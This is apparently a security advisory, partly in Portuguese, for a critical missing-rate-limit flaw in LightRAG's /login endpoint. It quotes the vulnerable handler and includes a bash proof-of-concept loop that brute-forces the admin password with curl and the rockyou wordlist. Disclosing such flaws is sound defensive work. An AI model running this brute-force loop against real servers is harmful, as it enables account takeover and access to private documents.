PT-2026-105818 · Pypi · Hkuds Lightrag

Publicado

2026-10-01

·

Atualizado

2026-10-01

CVSS v3.1

9.1

Crítica

VetorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Summary

The POST /login endpoint has no rate limiting, account lockout, or delay on failed attempts. An attacker can submit unlimited password guesses at full network speed.

Details

python
# lightrag/api/lightrag server.py:2161
@app.post("/login")
async def login(form data: OAuth2PasswordRequestForm = Depends()):
  if not auth handler.verify password(username, form data.password):
    raise HTTPException(status code=401, detail="Incorrect credentials")
  # No: rate limit / lockout / backoff / CAPTCHA / attempt counter
A search for slowapi, rate limit, lockout, or throttle in lightrag/api/ returns zero results.

PoC

bash
# Brute-force /login with a wordlist, no throttling
while IFS= read -r pass; do
 code=$(curl -s -o /dev/null -w "%{http code}" 
  -X POST http://<TARGET>:9621/login 
  -d "username=admin&password=${pass}")
 [ "$code" = "200" ] && echo "[FOUND] $pass" && break
done < /usr/share/wordlists/rockyou.txt

Impact

Improper restriction of authentication attempts. Any network-reachable attacker can brute-force user passwords without restriction. Once credentials are recovered, the attacker gains full authenticated access to all documents, knowledge graph, and administrative operations.

Correção

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾

Identificadores relacionados

PYSEC-2026-4062

Produtos afetados

Hkuds Lightrag